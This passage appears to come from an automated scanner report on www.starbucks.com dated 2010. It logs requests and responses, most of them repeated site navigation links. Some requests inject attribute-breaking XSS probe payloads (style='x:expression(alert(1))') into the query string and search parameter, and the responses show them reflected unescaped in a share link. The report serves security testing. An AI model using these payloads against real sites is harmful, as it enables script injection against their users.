<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...
<div>
       <img class="tracking" src="http://leadback.advertising.com/adcedge/lb?site=695501&amp;srvc=1&amp;betr=starb_cs=1&amp;betq=9909=414691" alt="" />
       
       <object class="tracking" data="https://fls.vulnerable.ad.partner/activityi;src=2206715;type=starb723;cat=starb998;ord=43878730?"></object>
...[SNIP]...

9.3. http://www.starbucks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e=1 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; _chartbeat2=qspoj3z1snwoz3gj

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=h40ppc45qn2lqbyzsej1fh55; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:40:26 GMT
Content-Length: 41208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<dd id="get_flash"><a href="http://get.adobe.com/flashplayer/"><img src="/static/images/plugins/get_flashplayer.gif" alt="Get Flash" /></a><a href="http://get.adobe.com/flashplayer/">For an enhanced experience install flash</a>
...[SNIP]...
<li id="community_msi"><a href="http://www.mystarbucksidea.com">Share your ideas on <strong>
...[SNIP]...
<li id="community_facebook"><a href="http://www.facebook.com/starbucks">Find us on <strong>
...[SNIP]...
<li id="community_twitter"><a href="http://www.twitter.com/starbucks">Follow us on <strong>
...[SNIP]...
<h2><a href="http://www.starbucksstore.com/Tours/">Take a Taste Journey</a>
...[SNIP]...
<p style="background-color:#330000"><a href="http://www.starbucksstore.com/Tours/">Learn about the richness and complexity of our coffees & teas through our carefully selected coffee & tea tours.</a>
...[SNIP]...
<p><a href="http://starbucks.tekgroup.com/news/">See All News Headlines</a>
...[SNIP]...
</span>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/?8af12"style="x:expression(alert(1))"9f35c014f5e=1" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...
<div>
       <img class="tracking" src="http://leadback.advertising.com/adcedge/lb?site=695501&amp;srvc=1&amp;betr=starb_cs=1&amp;betq=9909=414691" alt="" />
       
       <object class="tracking" data="https://fls.vulnerable.ad.partner/activityi;src=2206715;type=starb723;cat=starb998;ord=46362303?"></object>
...[SNIP]...

9.4. http://www.starbucks.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?keywords=%27&61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=new0hf55b2avrbbgt3d0fz45; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:41:04 GMT
Content-Length: 33815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</span>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/search?keywords='&61fd7"style="x:expression(alert(1))"61073b145fc=1" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
